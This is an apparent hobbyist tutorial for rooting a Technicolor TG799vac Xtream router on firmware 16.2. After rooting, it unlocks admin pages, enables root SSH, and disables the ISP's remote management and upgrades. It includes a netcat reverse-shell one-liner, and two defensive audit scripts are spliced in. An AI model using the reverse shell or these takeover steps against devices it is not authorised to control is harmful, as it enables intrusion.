My personal, unique wiki for hacking the router firmware used by the (Telia) TG799vac Xtream, version 16.2 Jade, delivered by Technicolor
Telia users with this router model can finally unlock the router and add more features by hacking the firmware, thanks to an exploit missed by the Technicolor developers. This hack works for all internet providers worldwide that deliver this router, as long as you are using the same version as in this tutorial, Jade (16.2). Technicolor has fixed the exploit in version 17.* and above. Telia is still using version 16.2 as the default, so hurry up before it is too late, since the router otherwise upgrades itself. In this wiki I will show how you can turn this auto-upgrade off.
Please note that if you rent your router from your carrier, you will be liable for repayment if you brick the device. This is stated in the agreement you have with your carrier; at least Telia customers have entered into such an agreement if they chose to get the router along with the order of the internet subscription. Please check this first if you do not want to risk paying compensation for a bricked device, because there is always a risk when hacking firmware. If you follow my guide then everything should be fine, but I will not take any responsibility if you brick your device in any way at all!!!! All users following this wiki are hacking their device at their own risk and have been well informed of the risks that hacking the firmware CAN cause!!
Required for this tutorial:
Of course, a Thomson TG799vac-Xtreme router with firmware version 16.2.
Netcat, which is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is available for Linux and Windows; for Android use Termux, which provides netcat. For OSX/iOS I have no idea what is available because I do not care. ;)
With all that said, let's start with the fun part.
nc -lvvp [machine_port]
nc [machine_IP] [machine_port] -e /bin/sh
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.mmpbxglobalmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
# NOTE!! THIS IS A BACKDOOR > Please go whois the IP to witness it yourself
# So who has access to the machines running on this IP? Of course I asked,
# and Telia told me in a mail that **ALL** people who work for Telia Support!! **As if we can know if this is abused?**
sed -i s/'131.116.22.242'/'xx.xx.xx.xx'/g /etc/config/dropbear
# NOTE!! THIS IS A BACKDOOR > Please go whois the IP to witness it yourself
# This backdoor is for **ALL** people who work for Technicolor Technologies in Belgium!! **As if we can know if this is abused?**
sed -i s/'82.146.125.0'/'xx.xx.xx.xx'/g /etc/config/dropbear
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear
sed -i '21s/off/on/' /etc/config/dropbear
sed -i '24s/0/1/' /etc/config/dropbear
sed -i '25s/0/1/' /etc/config/dropbear
/etc/init.d/nginx restart
Let me provide the default view so you can see the difference before and after we run these commands, since I know that there are people who are paranoid about changes made as root. ;) The firmware has been extremely downgraded, for the worse for us consumers.
uci add_list web.ruleset_main.rules=cwmpconfmodal
uci add_list web.ruleset_main.rules=mmpbxinoutgoingmapmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci set web.iproutesmodal=rule
uci set web.cwmpconfmodal=rule
uci set web.natalghelpermodal=rule
uci set web.mmpbxstatisticsmodal=rule
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=natalghelpermodal
uci add_list web.ruleset_main.rules=diagnosticstcpdumpmodal
uci set web.diagnosticstcpdumpmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.systemmodal=rule
uci set web.relaymodal=rule
uci add_list web.parentalblock.roles=admin
uci add_list web.diagnosticstcpdumpmodal.roles=admin
uci add_list web.natalghelpermodal.roles=admin
uci add_list web.relaymodal.roles=admin
uci add_list web.cwmpconfmodal.roles=admin
uci add_list web.iproutesmodal.roles=admin
uci add_list web.systemmodal.roles=admin
uci add_list web.mmpbxstatisticsmodal.roles=admin
uci add_list web.mmpbxinoutgoingmapmodal.roles=admin
uci add_list web.xdsllowmodal.roles='admin'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.cwmpconfmodal.target='/modals/cwmpconf-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.mmpbxstatisticsmodal.target='/modals/mmpbx-statistics-modal.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci set system.config.export_plaintext='1'
uci set system.config.export_unsigned='1'
uci set system.config.import_plaintext='1'
uci set system.config.import_unsigned='1'
uci set dropbear.lan.enable='1'
uci set dropbear.lan.PasswordAuth=on
uci set dropbear.lan.RootPasswordAuth=on
uci set hotspotd.TLS2G.enable=0
uci set hotspotd.FON2G.enable=0
uci set hotspotd.main.ipv4=0
uci set wifi_doctor_agent.config.enabled=0
uci set cwmpd.cwmpd_config.state=0
uci set cwmpd.cwmpd_config.upgradesmanaged=0
uci set cwmpd.cwmpd_config.periodicinform_enable=0
uci set cwmpd.cwmpd_config.acs_pass='0'
uci set cwmpd.cwmpd_config.acs_user='0'
uci set tls-vsparc.Config.Enabled='0'
uci set tls-vsparc.Passive.PassiveEnabled='0'
uci set hotspotd.main.enable=false
uci set hotspotd.main.deploy=false
uci del_list xdsl.dsl0.profile='8a'
uci del_list xdsl.dsl0.profile='8b'
uci del_list xdsl.dsl0.profile='8c'
uci del_list xdsl.dsl0.profile='8d'
uci del_list xdsl.dsl0.profile='12a'
uci del_list xdsl.dsl0.profile='12b'
uci del_list xdsl.dsl0.multimode='gdmt'
uci del_list xdsl.dsl0.multimode='adsl2annexm'
uci del_list xdsl.dsl0.multimode='adsl2plus'
uci set xdsl.dsl0.maxaggrdatarate='200000' # 16000 default
uci set xdsl.dsl0.maxdsdatarate='140000' # 11000 default
uci set xdsl.dsl0.maxusdatarate='60000' # 40000 default
uci set wireless.radio_2G.state='0'
uci set wireless.radio_5G.state='0'
uci show dhcp.lan.ignore='1'
uci set system.ntp.enable_server='0'
uci commit
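A check that the remote-management settings changed above are still in place, as an added example that is not part of the original wiki. It reads `uci show` output and reports every key that no longer has the value set on this page; the function name and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example. Expected values are copied from the `uci set` lines on this page.
EXPECTED="cwmpd.cwmpd_config.state=0
cwmpd.cwmpd_config.upgradesmanaged=0
cwmpd.cwmpd_config.periodicinform_enable=0
tls-vsparc.Config.Enabled=0
tls-vsparc.Passive.PassiveEnabled=0
wifi_doctor_agent.config.enabled=0"

# Constructed sample of `uci show` output: CWMP has been switched back on.
SAMPLE="cwmpd.cwmpd_config=cwmpd
cwmpd.cwmpd_config.state='1'
cwmpd.cwmpd_config.upgradesmanaged='0'
cwmpd.cwmpd_config.periodicinform_enable='1'
tls-vsparc.Config.Enabled='0'
wifi_doctor_agent.config.enabled='0'"

# audit_uci: read `uci show` output on stdin, print one line per expected key
# that is missing or has another value; exit status = number of such keys.
audit_uci() {
    EXPECTED="$EXPECTED" awk '
    BEGIN {
        q = sprintf("%c", 39); bad = 0             # q is a single quote
        n = split(ENVIRON["EXPECTED"], rows, "\n")
        for (i = 1; i <= n; i++) {
            eq = index(rows[i], "=")
            want[substr(rows[i], 1, eq - 1)] = substr(rows[i], eq + 1)
        }
    }
    {
        eq = index($0, "=")
        if (eq == 0) next
        key = substr($0, 1, eq - 1)
        val = substr($0, eq + 1)
        gsub("^" q "|" q "$", "", val)             # uci show quotes values
        if (key in want) seen[key] = val
    }
    END {
        for (k in want) {
            if (!(k in seen)) { print "MISSING " k " want=" want[k]; bad++ }
            else if (seen[k] != want[k]) { print "DRIFT " k "=" seen[k] " want=" want[k]; bad++ }
        }
        exit bad
    }'
}

# On the router: uci show | audit_uci
printf '%s\n' "$SAMPLE" | audit_uci || echo "settings differ from the page's values"
```

Running it after a reboot or a configuration restore shows whether CWMP or the managed-upgrade flag has been switched back on.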
/etc/init.d/igmpproxy stop
/etc/init.d/igmpproxy disable
uci set network.lan.dns='8.8.8.8'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'
uci commit
cat /etc/resolv.conf
uci set web.uidefault.nsplink='https://sendit.nu'
netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u
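The pipeline above prints an empty field for IPv4-mapped peers such as `::ffff:a.b.c.d:port`, because it splits on the first colon. The following added example (not part of the original wiki) strips the port instead and flags established connections whose peer is one of the two addresses this page replaces in /etc/config/dropbear. The function name, the sample lines and the /24 treatment of the address ending in `.0` are assumptions.

```shell
#!/bin/sh
# Added example. The two addresses are the ones this page replaces in
# /etc/config/dropbear; matching an entry ending in ".0" as a /24 prefix is an
# assumption made here, the page does not give a netmask.
WATCH="131.116.22.242 82.146.125.0"

# Constructed sample of `netstat -lantp` output (header lines omitted).
SAMPLE_NETSTAT="tcp 0 0 192.168.1.1:22 192.168.1.50:51234 ESTABLISHED 1201/dropbear
tcp 0 0 ::ffff:203.0.113.7:22 ::ffff:131.116.22.242:40022 ESTABLISHED 1377/dropbear
tcp 0 0 203.0.113.7:51007 82.146.125.17:443 ESTABLISHED 902/cwmpd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 811/nginx"

# watched_peers: read netstat output on stdin and print "peer process" for
# every ESTABLISHED connection whose remote address is on the watch list.
watched_peers() {
    WATCH="$WATCH" awk '
    BEGIN { n = split(ENVIRON["WATCH"], w, " ") }
    $6 == "ESTABLISHED" {
        peer = $5
        sub(/:[0-9]+$/, "", peer)        # drop the port, keep the address
        sub(/^::ffff:/, "", peer)        # IPv4-mapped form on dual-stack sockets
        for (i = 1; i <= n; i++) {
            net = w[i]
            if (net ~ /\.0$/) {           # assumed /24: compare first three octets
                sub(/0$/, "", net)
                hit = (index(peer, net) == 1)
            } else hit = (peer == net)
            if (hit) { print peer, $7; break }
        }
    }' | sort -u
}

# On the router: netstat -lantp | watched_peers
printf '%s\n' "$SAMPLE_NETSTAT" | watched_peers
```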
uci set mobiled.globals.enabled='0'
uci set mobiled.device_defaults.enabled='0'
uci commit
/etc/init.d/mobiled stop
/etc/init.d/mobiled disable
uci set samba.samba.enabled='0'
/etc/init.d/samba stop
/etc/init.d/samba disable
/etc/init.d/samba-nmbd stop
/etc/init.d/samba-nmbd disable
uci set dlnad.config.enabled='0'
uci commit
/etc/init.d/dlnad stop
/etc/init.d/dlnad disable
cat /tmp/dhcp.leases
1534969000 macaddr lanip machine macaddr
cat /tmp/arp.log
root@OpenWrt:/tmp# cat /tmp/arp.log
IP address HW type Flags HW address Mask Device
lanip 0x1 0x2 X0:X0:X0:X0:X0:X0 * br-lan
mgmt_ip 0x1 0x2 X0:X0:X0:X0:X0:X0 * vlan_mgmt
wanip 0x1 0x2 X0:X0:X0:X0:X0:X0 * eth4
ifconfig -a | sed '/eth\|wl/!d;s/ Link.*HWaddr//'
eth0 X0:X0:X0:X0:X0:X0
eth1 X0:X0:X0:X0:X0:X0
eth2 X0:X0:X0:X0:X0:X0
eth3 X0:X0:X0:X0:X0:X0
eth4 X0:X0:X0:X0:X0:X0
eth5 X0:X0:X0:X0:X0:X0
vlan_eth0 X0:X0:X0:X0:X0:X0
vlan_eth1 X0:X0:X0:X0:X0:X0
vlan_eth2 X0:X0:X0:X0:X0:X0
vlan_eth3 X0:X0:X0:X0:X0:X0
vlan_eth5 X0:X0:X0:X0:X0:X0
wl0 X0:X0:X0:X0:X0:X0
wl0_1 X0:X0:X0:X0:X0:X0
wl0_2 X0:X0:X0:X0:X0:X0
uci set system.@trafficmon[0].interface=''
uci set system.@trafficmon[0].minute=''
uci set system.@trafficmon[1].interface=''
uci set system.@trafficmon[1].minute=''
uci set system.@trafficmon[2].interface=''
uci set system.@trafficmon[2].minute=''
uci set system.@trafficmon[3]=trafficmon
uci set system.@trafficmon[3].interface=''
uci set system.@trafficmon[3].minute=''
uci set tod.global.enabled='0'
uci commit
/etc/init.d/tod stop
/etc/init.d/tod disable
http://192.168.1.1/?debug=1
mount -o remount,rw /
uci set system.@coredump[0].reboot='0'
uci commit system
opkg install wget
Installing wget (1.13.4-1) to root...
Downloading http://downloads.openwrt.org/attitude_adjustment/12.09/brcm63xx/generic/packages//wget_1.13.4-1_brcm63xx.ipk.
Multiple packages (librt and librt) providing same name marked HOLD or PREFER. Using latest.
Configuring wget.
strings /etc/cwmpd.db
SQLite format 3
tabletidkvtidkv
CREATE TABLE tidkv ( type TEXT NOT NULL, id TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (type, id, key)))
indexsqlite_autoindex_tidkv_1tidkv
transferPassword5
transfer Username
Stransfer URLhttp://192.168.21.52:7547/ACS-server
5transferaStartTime2018-08-19T15:20:13Z
transfera FaultStringcomplete
transfera FaultCode0M_
M%5transfera CompleteTime2018-08-19T15:19:57Z
'transfera TimeStamp244,9XXXXXX
transfera DelaySeconds3
transfera Password
transfera Username
runtimevarParameterKey#
runtimevarConfigurationVersionD
%_runtimevarBootStrappedhttps://acs.telia.com:7575/ACS-server/ACS-
+/VersionsSoftwareVersion16.2.XXXXXX
transfer FaultString
transfer FaultCode
transfer TimeSt6
transfera UsernameU
transfera URLT7
transfera TimeStampX
transfera SubStatec
transfera Stateb7
transfera StartTimed
transfera PasswordV
...........
You can copy and paste everything from below the video if you are lazy.
cat /etc/config/network | grep -A11 "interface 'lan'" # This will list current settings
config interface 'lan'
option type 'bridge'
option proto 'static'
option ipaddr '192.168.1.1'
option netmask '255.255.255.0'
option force_link '0'
option ip6hint '0'
option igmp_snooping '0'
option ipv6 '0'
option ip6assign '64'
# option ifname 'vlan_eth0 vlan_eth1 vlan_eth2 vlan_eth3 vlan_eth5'
# list pppoerelay ''
list ifname 'eth0'
list ifname 'eth1'
list ifname 'eth2'
list ifname 'wl0'
list ifname 'wl0_1'
list ifname 'wl1'
list ifname 'wk1_1'
ssh-keygen -t dsa
scp ~/.ssh/id_dsa.pub [email protected]:/tmp
cd /etc/dropbear
cat /tmp/id_*.pub >> authorized_keys
chmod 0600 authorized_keys
exit
ssh [email protected] "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub
ssh [email protected]
Then we have to edit the CSS files. I won't go through every color since it's a huge job and really boring, since Telia uses like 10 different shades of their purple color!! :-/ But as an example, to change the background of the web interface you can copy and paste in the shell:
sed -i s/'eeeeee'/'000000'/g gw.css; sed -i s/'eeeeee'/'000000'/g lte-doctor.css;
sed -i s/'eeeeee'/'000000'/g responsive.css; sed -i s/'eeeeee'/'000000'/g mobiled.css;
sed -i s/'eeeeee'/'000000'/g chosen.css
As you can see in the pictures below, the background has been changed. If you want to use 'theme wuseman' on your Technicolor TG799-vac Xtreme router, then copy & paste my commands below the previews (or download my CSS files and scp them over to the router):
sed -i s/'333333'/'e6e6e6'/g gw.css; sed -i s/'333333'/'e6e6e6'/g responsive.css; sed -i s/'333333'/'e6e6e6'/g lte-doctor.css;
sed -i s/'333333'/'e6e6e6'/g chosen.css; sed -i s/'333333'/'e6e6e6'/g mobiled.css; sed -i s/'990ae3'/'55aa7f'/g gw.css;
sed -i s/'990ae3'/'55aa7f'/g responsive.css; sed -i s/'990ae3'/'55aa7f'/g chosen.css; sed -i s/'990ae3'/'55aa7f'/g mobiled.css;
sed -i s/'eeeeee'/'2f5e45'/g gw.css; sed -i s/'eeeeee'/'2f5e45'/g responsive.css; sed -i s/'eeeeee'/'2f5e45'/g lte-doctor.css;
sed -i s/'eeeeee'/'2f5e45'/g chosen.css; sed -i s/'eeeeee'/'2f5e45'/g mobiled.css; sed -i s/'a70af5'/'55aa7f'/g gw.css;
sed -i s/'990ae3'/'00aa00'/g gw.css; sed -i s/'45004e'/'005100'/g gw.css; sed -i s/'4d234d'/'003e00'/g gw.css;
sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g responsive.css; sed -i s/'990ae3'/'00aa00'/g responsive.css;
sed -i s/'45004e'/'005100'/g responsive.css; sed -i s/'4d234d'/'003e00'/g responsive.css;
sed -i s/'purple'/'green'/g responsive.css; sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g lte-doctor.css;
sed -i s/'990ae3'/'00aa00'/g lte-doctor.css; sed -i s/'45004e'/'005100'/g lte-doctor.css; sed -i s/'4d234d'/'003e00'/g lte-doctor.css;
sed -i s/'purple'/'green'/g gw.css; sed -i s/'a70af5'/'55aa7f'/g chosen.css; sed -i s/'990ae3'/'00aa00'/g chosen.css;
sed -i s/'45004e'/'005100'/g chosen.css; sed -i s/'purple'/'green'/g lte-doctor.css; sed -i s/'4d234d'/'003e00'/g chosen.css;
sed -i s/'purple'/'green'/g chosen.css; sed -i s/'a70af5'/'55aa7f'/g mobiled.css; sed -i s/'990ae3'/'00aa00'/g mobiled.css;
sed -i s/'45004e'/'005100'/g mobiled.css; sed -i s/'4d234d'/'003e00'/g mobiled.css; sed -i s/'purple'/'green'/g mobiled.css;
sed -i s/'6dc56d'/'62ff00'/g gw.css; sed -i s/'6dc56d'/'62ff00'/g responsive.css; sed -i s/'6dc56d'/'62ff00'/g lte-doctor.css;
sed -i s/'6dc56d'/'62ff00'/g chosen.css; sed -i s/'6dc56d'/'62ff00'/g mobiled.css; sed -i s/'999'/'66ffe1'/g responsive.css;
sed -i s/'f5f5f5'/'183124'/g gw.css; sed -i s/'f5f5f5'/'183124'/g responsive.css; sed -i s/'f5f5f5'/'183124'/g lte-doctor.css;
sed -i s/'f5f5f5'/'183124'/g chosen.css; sed -i s/'f5f5f5'/'183124'/g mobiled.css; sed -i s/'ffffff'/'ffaa00'/g mobiled.css;
sed -i s/'aaaaaa'/'87ff66'/g gw.css; sed -i s/'aaaaaa'/'87ff66'/g responsive.css; sed -i s/'aaaaaa'/'87ff66'/g lte-doctor.css;
sed -i s/'aaaaaa'/'87ff66'/g chosen.css; sed -i s/'aaaaaa'/'87ff66'/g mobiled.css; sed -i s/'ffffff'/'ffaa00'/g gw.css;
sed -i s/'ffffff'/'ffaa00'/g responsive.css; sed -i s/'ffffff'/'ffaa00'/g lte-doctor.css; sed -i s/'ffffff'/'ffaa00'/g chosen.css;
sed -i s/'ffffff'/'ffaa00'/g gw.css; sed -i s/'ffffff'/'ffaa00'/g responsive.css; sed -i s/'ffffff'/'ffaa00'/g lte-doctor.css;
sed -i s/'ffffff'/'ffaa00'/g chosen.css; sed -i s/'ffffff'/'ffaa00'/g mobiled.css; sed -i s/'999'/'66ffe1'/g gw.css;
sed -i s/'999'/'66ffe1'/g lte-doctor.css; sed -i s/'999'/'66ffe1'/g mobiled.css; sed -i s/'ccc'/'66ffe1'/g gw.css;
sed -i s/'ccc'/'66ffe1'/g responsive.css; sed -i s/'ccc'/'66ffe1'/g lte-doctor.css; sed -i s/'ccc'/'66ffe1'/g chosen.css;
sed -i s/'ccc'/'66ffe1'/g mobiled.css; sed -i s/'ccc'/'66ffe1'/g gw.css; sed -i s/'ccc'/'66ffe1'/g responsive.css;
sed -i s/'ccc'/'66ffe1'/g lte-doctor.css; sed -i s/'ccc'/'66ffe1'/g chosen.css; sed -i s/'ccc'/'66ffe1'/g mobiled.css;
sed -i s/'d9d9d9'/'222222'/g gw.css; sed -i s/'d9d9d9'/'222222'/g responsive.css; sed -i s/'0088cc'/'5ebe8d'/g gw.css;
sed -i s/'d9d9d9'/'222222'/g lte-doctor.css; sed -i s/'d9d9d9'/'222222'/g chosen.css; sed -i s/'0088cc'/'5ebe8d'/g responsive.css;
sed -i s/'0088cc'/'5ebe8d'/g lte-doctor.css; sed -i s/'0088cc'/'5ebe8d'/g chosen.css
If you have problems, questions, ideas or suggestions please contact us by posting to [email protected]
Visit our homepage for the latest info and updated tools
https://sendit.nu & https://github.com/wuseman/